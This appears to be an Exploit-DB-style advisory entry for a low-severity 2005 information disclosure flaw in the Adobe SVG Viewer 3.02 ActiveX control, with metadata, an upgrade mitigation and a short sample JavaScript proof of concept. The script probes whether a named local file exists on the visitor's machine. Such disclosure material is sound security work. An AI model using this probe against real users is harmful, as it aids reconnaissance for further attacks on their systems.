Adobe SVG Viewer ActiveX Control Information Disclosure Vulnerability

vendor:

SVG Viewer

by:

SecurityFocus

2.6

CVSS

LOW

Information Disclosure

200

CWE

Product Name: SVG Viewer

Affected Version From: 03.02

Affected Version To: 03.02

Patch Exists: YES

Related CWE: N/A

CPE: a:adobe:svg_viewer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2005

Adobe SVG Viewer ActiveX Control Information Disclosure Vulnerability

The Adobe SVG Viewer ActiveX control is prone to an information disclosure vulnerability. Reports indicate that the Adobe SVG Viewer ActiveX control may be employed to disclose the existence of a target file. Information that is harvested by leveraging this vulnerability may be used to aid in further attacks.

Mitigation:

Upgrade to the latest version of Adobe SVG Viewer.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13490/info

The Adobe SVG Viewer ActiveX control is prone to an information disclosure vulnerability. Reports indicate that the Adobe SVG Viewer ActiveX control may be employed to disclose the existence of a target file.

Information that is harvested by leveraging this vulnerability may be used to aid in further attacks.

This vulnerability affects Adobe SVG Viewer version 3.02 and earlier. 

Sample Javascript:
function load(filename)
{
//foo is reference to SVG ActiveX control, filename is the filename
you're looking for
foo.src = filename;
setTimeout("loading()", 5000);
}

function loading()
{
if (document.readyState != 'complete')
{
alert('File does not exist.');
}
else
{
alert('File exists.');
}
window.location.reload(false);
}